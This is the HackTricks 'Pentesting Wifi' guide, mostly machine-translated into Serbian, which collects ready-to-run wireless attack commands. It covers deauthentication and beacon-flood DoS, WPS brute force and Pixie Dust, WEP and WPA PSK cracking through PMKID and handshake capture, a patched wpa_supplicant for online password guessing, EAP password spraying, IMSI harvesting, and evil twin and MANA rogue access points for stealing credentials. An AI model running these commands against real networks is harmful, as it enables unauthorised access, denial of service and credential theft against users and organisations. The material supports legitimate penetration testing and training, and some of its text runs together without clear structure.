Pentesting Wifi

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Wifi osnovne komande

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Alati

Hijacker & NexMon (interni Wi-Fi na Androidu)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Pokrenite airgeddon koristeći docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Može izvesti Evil Twin, KARMA i Known Beacons napade, a zatim koristiti phishing template da bi pribavio stvarnu lozinku mreže ili ukrao pristupne podatke društvenih mreža.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Ovaj alat automatizuje WPS/WEP/WPA-PSK napade. Automatski će:

• Postaviti interfejs u monitor mode
• Skenirati moguće mreže - i dozvoliti ti da izabereš victim(s)
• Ako je WEP - Pokrenuti WEP napade
• Ako je WPA-PSK
• Ako je WPS: Pixie dust attack i bruteforce attack (pazi, brute-force attack može potrajati dugo). Imaj na umu da ne pokušava null PIN ili database/generated PINs.
• Pokušati da uhvati PMKID sa AP-a kako bi ga crackovao
• Pokušati da deauthenticate klijente AP-a kako bi uhvatio handshake
• Ako PMKID ili Handshake, pokušati da bruteforce-uje koristeći top5000 passwords.

Sažetak napada

• DoS
• Deauthentication/disassociation – Disconnect everyone (or a specific ESSID/Client)
• Random fake APs – Sakriti mreže, moguće oboriti skenere
• Overload AP – Pokušati da oboriš AP (obično nije naročito korisno)
• WIDS – Igrati se sa IDS-om
• TKIP, EAPOL – Neki specifični napadi za DoS nekih AP-ova
• Cracking
• Crack WEP (više alata i metoda)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Korisno za hvatanje captive portal creds i/ili izvođenje LAN napada
• WPA-PSK Evil Twin – Korisno za mrežne napade ako znaš lozinku
• WPA-MGT – Korisno za hvatanje company credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Korisno za hvatanje captive portal creds i/ili izvođenje LAN napada
• + WPA – Korisno za hvatanje WPA handshakes

Brze beleške o Open / OWE mrežama

• Passive capture na otvorenim SSID-ovima i dalje radi sa monitor mode i tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on “open” SSIDs. Being WPA3-based, it also enforces 802.11w PMF, which blocks spoofed deauth/disassoc frames.
• OWE does not authenticate joiners: anyone can associate, so verify client isolation instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works.
• Evil Twin remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained.
• Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Opis iz here:.

Deauthentication napadi, raširen metod u Wi-Fi hakovanju, podrazumevaju falsifikovanje “management” frames kako bi se silom isključili uređaji sa mreže. Ovi nešifrovani paketi obmanjuju klijente da poveruju da potiču od legitimne mreže, omogućavajući napadačima da prikupe WPA handshakes radi krckanja ili da uporno ometaju mrežne veze. Ova taktika, alarmantna u svojoj jednostavnosti, široko se koristi i ima značajne implikacije po sigurnost mreže.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 znači deauthentication
• 1 je broj deauths koje treba poslati (možete poslati više ako želite); 0 znači slati ih kontinuirano
• -a 00:14:6C:7E:40:80 je MAC address access point-a
• -c 00:0F:B5:34:30:30 je MAC address klijenta koji treba deauthenticate; ako je ovo izostavljeno, šalje se broadcast deauthentication (ne radi uvek)
• ath0 je interface name

Disassociation Packets

Disassociation packets, slični deauthentication packets, su tip management frame koji se koristi u Wi‑Fi mrežama. Ovi paketi služe da prekinu vezu između uređaja (na primer laptop ili smartphone) i access point-a (AP). Osnovna razlika između disassociation i deauthentication leži u scenarijima upotrebe. Dok AP emituje deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, restart, or relocating, thereby necessitating the disconnection of all connected nodes.

Ovaj napad se može izvesti pomoću mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Više DOS napada od mdk4

Vidi here.

ATTACK MODE b: Beacon Flooding

Šalje beacon frames kako bi prikazao lažne APs klijentima. Ovo ponekad može srušiti network scanners, pa čak i drivers!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Slanje authentication frames svim dostupnim Access Points (APs) u dometu može preopteretiti te APs, naročito kada je uključen veliki broj clients. Ovaj intenzivan saobraćaj može dovesti do nestabilnosti sistema, zbog čega se neki APs mogu zamrznuti ili čak resetovati.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) proverava da li je SSID pravilno otkriven i potvrđuje domet AP-a. Ova tehnika, u kombinaciji sa bruteforcing hidden SSIDs sa ili bez wordlist, pomaže u identifikaciji i pristupu skrivenim mrežama.

ATTACK MODE m: Michael Countermeasures Exploitation

Slanje nasumičnih ili dupliciranih paketa u različite QoS redove može pokrenuti Michael Countermeasures na TKIP APs, što dovodi do jednominutnog gašenja AP-a. Ova metoda je efikasna taktika DoS (Denial of Service) napada.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Poplava AP-a sa EAPOL Start frames stvara fake sessions, preopterećujući AP i blokirajući legitimne klijente. Alternativno, injektovanje fake EAPOL Logoff messages prinudno prekida veze klijenata; obe metode efikasno ometaju mrežnu uslugu.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Napadi na IEEE 802.11s mesh mreže

Razni napadi na upravljanje linkovima i rutiranje u mesh mrežama.

ATTACK MODE w: WIDS Confusion

Povezivanje klijenata na više WDS čvorova ili lažnih rogue APs može manipulirati Intrusion Detection and Prevention Systems, izazivajući zabunu i potencijalnu zloupotrebu sistema.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

Packet fuzzer koji nudi različite izvore paketa i sveobuhvatan skup modifikatora za manipulaciju paketima.

Airggedon

Airgeddon nudi većinu napada pomenutih u prethodnim komentarima:

WPS

WPS (Wi‑Fi Protected Setup) pojednostavljuje proces povezivanja uređaja na ruter, ubrzavajući i olakšavajući podešavanje za mreže šifrovane sa WPA ili WPA2 Personal. Neefikasan je protiv lako kompromitovane WEP bezbednosti. WPS koristi 8‑cifreni PIN, validiran u dve polovine, što ga čini podložnim brute-force napadima zbog ograničenog broja kombinacija (oko 11.000 mogućnosti).

WPS Bruteforce

Postoje 2 glavna alata za izvođenje ove akcije: Reaver i Bully.

• Reaver je dizajniran da bude robusni i praktični alat za napad na WPS, i testiran je na širokom spektru access point-ova i WPS implementacija.
• Bully je nova implementacija WPS brute force napada, napisana u C. Ima nekoliko prednosti u odnosu na originalni reaver kod: manje zavisnosti, poboljšane performanse memorije i CPU-a, ispravno rukovanje endianness-om i robusniji skup opcija.

Napad iskorišćava ranjivost WPS PIN-a, naročito izlaganje prvih četiri cifre i ulogu poslednje cifre kao checksum-a, što olakšava brute-force napad. Međutim, odbrana od brute-force napada, kao što je blokiranje MAC adresa agresivnih napadača, zahteva MAC address rotation da bi se napad nastavio.

Nakon dobijanja WPS PIN-a pomoću alata kao što su Bully ili Reaver, napadač može izračunati WPA/WPA2 PSK, obezbeđujući trajni pristup mreži.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Ovaj rafinirani pristup cilja WPS PINs koristeći poznate ranjivosti:

1. Prethodno otkriveni PINs: Iskoristite bazu poznatih PINs povezanih sa određenim proizvođačima koji su poznati po korišćenju uniformnih WPS PINs. Ova baza povezuje prva tri okteta MAC-addresses sa verovatnim PINs za te proizvođače.
2. Algoritmi za generisanje PINs: Iskoristite algoritme poput ComputePIN i EasyBox, koji računaju WPS PINs na osnovu MAC-address-a AP-a. Arcadyan algoritam dodatno zahteva device ID, dodajući sloj procesu generisanja PINs.

WPS Pixie Dust attack

Dominique Bongard je otkrio propust u nekim Access Points (APs) u vezi stvaranja tajnih kodova, poznatih kao nonces (E-S1 i E-S2). Ako se ovi nonces mogu otkriti, probijanje AP-ovog WPS PIN postaje lako. AP otkriva PIN unutar posebnog koda (hash) kako bi dokazao da je legitimno, a ne lažno (rogue) AP. Ovi nonces su ustvari “ključevi” za otključavanje “sefa” koji čuva WPS PIN. Više o ovome može se naći ovde.

Jednostavno rečeno, problem je u tome što neki APs nisu koristili dovoljno nasumične ključeve za enkripciju PIN-a tokom procesa povezivanja. To čini PIN ranjivim na pogađanje spolja iz mreže (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ako ne želite da prebacite uređaj u monitor mode, ili ako reaver i bully imaju neki problem, možete probati OneShot-C. Ovaj alat može da izvede Pixie Dust attack bez potrebe za prebacivanjem u monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Neki loše dizajnirani sistemi čak dozvoljavaju da Null PIN (prazan ili nepostojeći PIN) omogući pristup, što je prilično neobično. Alat Reaver može testirati ovu ranjivost, za razliku od Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Sve predložene WPS napade je lako izvesti koristeći airgeddon.

• 5 i 6 omogućavaju da isprobate vaš prilagođeni PIN (ako ga imate)
• 7 i 8 izvode Pixie Dust attack
• 13 vam omogućava da testirate NULL PIN
• 11 i 12 će prikupiti PIN-ove vezane za izabrani AP iz dostupnih baza podataka i generisati moguće PIN-ove koristeći: ComputePIN, EasyBox i opciono Arcadyan (preporučeno, zašto ne?)
• 9 i 10 će testirati svaki mogući PIN

WEP

Zašto se lomi

• RC4 seed is just IV (24 bits) + shared key. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream.
• XORing two ciphertexts with the same keystream leaks PlaintextA ⊕ PlaintextB; predictable headers + RC4 KSA biases (FMS) let you “glasate” key bytes. PTW optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions.
• Integrity is only CRC32 (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.

Praktično slamanje je determinističko:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon i dalje uključuje “All-in-One” WEP workflow ako više volite vođeni UI.

WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs one single packet and doesn’t require any clients to be connected to the target AP—just interaction between the attacker and the AP.

Mnogi moderni ruteri dodaju opcionalno polje u prvi EAPOL frame tokom asocijacije, poznato kao Robust Security Network. Ovo uključuje PMKID.

Kao što originalni post objašnjava, PMKID se kreira koristeći poznate podatke:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Pošto je “PMK Name” konstantan, znamo BSSID AP-a i stanice, a PMK je identičan onom iz full 4-way handshake, hashcat može iskoristiti ove informacije da crack-uje PSK i povrati passphrase!

Da biste prikupili ove informacije i lokalno bruteforce lozinku, možete uraditi:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured će biti prikazani u console i takođe sačuvani unutar _ /tmp/attack.pcap_
Sada konvertuj capture u hashcat/john format i crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Obratite pažnju da format ispravnog hasha sadrži 4 dela, kao na primer: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Ako vaš samo sadrži 3 dela, onda je neispravan (the PMKID capture wasn’t valid).

Imajte na umu da hcxdumptool takođe capture handshakes (pojaviće se nešto ovako: MP:M1M2 RC:63258 EAPOLTIME:17091). Možete pretvoriti handshakes u hashcat/john format koristeći cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Primetio sam da neki handshakes snimljeni ovim alatom nisu mogli biti cracked čak i kada je tačan password poznat. Preporučujem da, ako je moguće, handshakes takođe snimite na tradicionalan način, ili uhvatite više njih koristeći ovaj alat.

Handshake capture

Napad na WPA/WPA2 mreže može se izvesti hvatanjem handshake i pokušajem da se crack password offline. Ovaj proces podrazumeva nadgledanje komunikacije određene mreže i BSSID na određenom channel. Evo pojednostavljenog vodiča:

1. Identifikujte BSSID, channel, i connected client ciljane mreže.
2. Koristite airodump-ng za nadgledanje saobraćaja mreže na navedenom channel-u i BSSID-u, u nadi da ćete uhvatiti handshake. Komanda će izgledati ovako:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Da biste povećali šansu da uhvatite handshake, na kratko prekinite vezu klijenta sa mrežom kako biste ga primorali na ponovnu autentifikaciju. Ovo se može uraditi koristeći komandu aireplay-ng, koja šalje deauthentication packets klijentu:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Imajte na umu da, pošto je client bio deauthenticated, mogao je pokušati da se poveže na drugi AP ili, u drugim slučajevima, na drugu mrežu.

Kada se u airodump-ng pojave neke handshake informacije, to znači da je handshake uhvaćen i možete prestati sa slušanjem:

Kada je handshake uhvaćen, možete ga crack-ovati pomoću aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Proveri da li je handshake u fajlu

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Ako ovaj alat pronađe nepotpuni handshake za ESSID pre nego što pronađe kompletan, neće detektovati važeći handshake.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Brže online pogađanje PSK preko wpa_supplicant ctrl socket (no clients/PMKID)

Kada nema klijenata i AP odbija PMKID, možete iterativno isprobavati PSKs online bez respawn-ovanja supplicants:

• Patch wpa_supplicant.c da forsirate dur = 0; u auth failure backoff logici (oko ssid->auth_failures), čime se efektivno onemogućava temporary-disable timer.
• Pokrenite jedan daemon sa control socket-om:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Upravljajte njime putem kontrolnog interfejsa, ponovo koristeći isti scan i network:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

Mali Python loop koji čita socket događaje (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) može testirati ~100 pokušaja za ~5 minuta bez scan overhead. I dalje je bučno i detektabilno, ali izbegava restartove procesa po pokušaju i backoff kašnjenja.

WPA Enterprise (MGT)

U enterprise WiFi okruženjima naići ćete na različite metode autentifikacije, svaka pruža različite nivoe bezbednosti i mogućnosti upravljanja. Kada koristite alate poput airodump-ng za pregled mrežnog saobraćaja, možete primetiti identifikatore za ove tipove autentifikacije. Neke uobičajene metode uključuju:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Ova metoda podržava hardware tokens i one-time passwords unutar EAP-PEAP. Za razliku od MSCHAPv2, ne koristi peer challenge i šalje lozinke u plaintext do access point-a, što predstavlja rizik od downgrade attacks.

2. EAP-MD5 (Message Digest 5):

• Podrazumeva slanje MD5 heša lozinke sa klijenta. Nije preporučljivo zbog ranjivosti na dictionary attacks, nedostatka server authentication i nemogućnosti generisanja session-specific WEP keys.

3. EAP-TLS (Transport Layer Security):

• Koristi client-side i server-side certificates za autentikaciju i može dinamički generisati user-based i session-based WEP keys za zaštitu komunikacije.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Pruža mutual authentication kroz encrypted tunnel, zajedno sa metodom za izvlačenje dinamičkih, per-user, per-session WEP keys. Zahteva samo server-side certificates, dok klijenti koriste credentials.

5. PEAP (Protected Extensible Authentication Protocol):

• Radi slično EAP-u kreiranjem TLS tunela za zaštićenu komunikaciju. Omogućava korišćenje slabijih authentication protokola iznad EAP zbog zaštite koju tunel pruža.
• PEAP-MSCHAPv2: Često se naziva PEAP; kombinuje ranjivi MSCHAPv2 challenge/response mehanizam sa zaštitnim TLS tunnelom.
• PEAP-EAP-TLS (or PEAP-TLS): Slično EAP-TLS ali inicira TLS tunel pre razmene sertifikata, nudeći dodatni sloj zaštite.

Više informacija o ovim authentication metodama možete naći here and here.

Username Capture

Čitajući https://tools.ietf.org/html/rfc3748#page-27 deluje da ako koristite EAP onda “Identity” messages moraju biti podržani, i username će biti poslat u clear u “Response Identity” messages.

Čak i koristeći jedan od najsigurnijih authentication metoda: PEAP-EAP-TLS, moguće je capture the username sent in the EAP protocol. Da biste to uradili, capture-ujte authentication komunikaciju (start airodump-ng inside a channel i wireshark u istom interfejsu) i filtrirajte pakete po eapol.
Unutar “Response, Identity” paketa, pojaviće se username klijenta.

Anonymous Identities

Sakrivanje identity je podržano i od strane EAP-PEAP i EAP-TTLS. U kontekstu WiFi mreže, EAP-Identity request obično pokreće access point (AP) tokom association procesa. Da bi se osigurala zaštita anonymity korisnika, odgovor EAP klijenta na korisnikovom uređaju sadrži samo esencijalne informacije potrebne inicijalnom RADIUS serveru da obradi zahtev. Ovo je ilustrovano kroz sledeće scenarije:

• EAP-Identity = anonymous
• U ovom scenariju, svi korisnici koriste pseudonim “anonymous” kao svoj user identifier. Inicijalni RADIUS server funkcioniše kao EAP-PEAP ili EAP-TTLS server, zadužen za rukovođenje server-side dela PEAP ili TTLS protokola. Inner (protected) authentication metoda se onda ili lokalno obrađuje ili delegira remote (home) RADIUS serveru.
• EAP-Identity = anonymous@realm_x
• U ovoj situaciji, korisnici iz različitih realm-ova skrivaju svoje identitete dok ukazuju na svoje odgovarajuće realm-ove. Ovo omogućava inicijalnom RADIUS serveru da proxy-uje EAP-PEAP ili EAP-TTLS zahteve ka RADIUS serverima u njihovim home realm-ovima, koji deluju kao PEAP ili TTLS server. Inicijalni RADIUS server funkcioniše isključivo kao RADIUS relay node.
• Alternativno, inicijalni RADIUS server može funkcionisati kao EAP-PEAP ili EAP-TTLS server i ili obrađivati protected authentication metodu ili je proslediti drugom serveru. Ova opcija omogućava konfigurisanje različitih politika za različite realm-ove.

U EAP-PEAP, nakon što je TLS tunnel uspostavljen između PEAP servera i PEAP klijenta, PEAP server inicira EAP-Identity request i prenosi ga kroz TLS tunnel. Klijent odgovara na ovaj drugi EAP-Identity request slanjem EAP-Identity response koji sadrži stvarni identity korisnika kroz encrypted tunnel. Ovaj pristup efikasno sprečava otkrivanje stvarnog identiteta korisnika svima koji presreću 802.11 saobraćaj.

EAP-TTLS sledi blago drugačiju proceduru. Kod EAP-TTLS, klijent tipično autentifikuje koristeći PAP ili CHAP, osigurano TLS tunnel-om. U tom slučaju, klijent uključuje User-Name atribut i ili Password ili CHAP-Password atribut u inicijalnu TLS poruku poslatu nakon uspostavljanja tunela.

Bez obzira na izabrani protokol, PEAP/TTLS server saznaje stvarni identity korisnika tek nakon uspostavljanja TLS tunela. Stvarni identity može biti predstavljen kao user@realm ili jednostavno user. Ako PEAP/TTLS server takođe vrši autentikaciju korisnika, sada poseduje korisnikov identity i nastavlja sa authentication metodom zaštićenom TLS tunelom. Alternativno, PEAP/TTLS server može proslediti novi RADIUS zahtev korisnikovom home RADIUS serveru. Ovaj novi RADIUS zahtev izostavlja PEAP ili TTLS protocol layer. U slučajevima kada je protected authentication metoda EAP, inner EAP poruke se prenose home RADIUS serveru bez EAP-PEAP ili EAP-TTLS wrapper-a. User-Name atribut izlazne RADIUS poruke sadrži stvarni identity korisnika, zamenjujući anonymous User-Name iz dolaznog RADIUS zahteva. Kada je protected authentication metoda PAP ili CHAP (podržano samo od strane TTLS), User-Name i ostali authentication atributi izvučeni iz TLS payload-a zamenjuju se u izlaznoj RADIUS poruci, zamenjujući anonymous User-Name i TTLS EAP-Message atribute iz dolaznog RADIUS zahteva.

Za više informacija pogledajte https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Napomene:
- Radi pre bilo kog TLS tunela ako deployment koristi gol EAP‑SIM/AKA bez zaštićenog identiteta/pseudonima.
- Izložena vrednost je trajni identifikator vezan za SIM pretplatnika; njegovo sakupljanje omogućava dugoročno praćenje i naknadne zloupotrebe u telekomunikacijama.

Uticaj
- Privatnost: trajno praćenje korisnika/uređaja iz pasivnih Wi‑Fi presretanja na javnim mestima.
- Početna tačka za zloupotrebe u telekomu: sa IMSI, napadač sa pristupom SS7/Diameter može da upituje lokaciju ili pokuša presretanje poziva/SMS i krađu MFA.

Ublažavanja / na šta obratiti pažnju
- Potvrdite da klijenti koriste anonimne spoljne identitete (pseudonime) za EAP‑SIM/AKA u skladu sa 3GPP smernicama (npr. 3GPP TS 33.402).
- Preferirajte tunelovanje faze identiteta (npr. EAP‑TTLS/PEAP koji nosi unutrašnji EAP‑SIM/AKA) tako da IMSI nikada nije poslat u čistom tekstu.
- Snimci paketa prilikom association/auth nikada ne bi trebalo da otkriju sirovi IMSI u EAP-Response/Identity.

Related: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5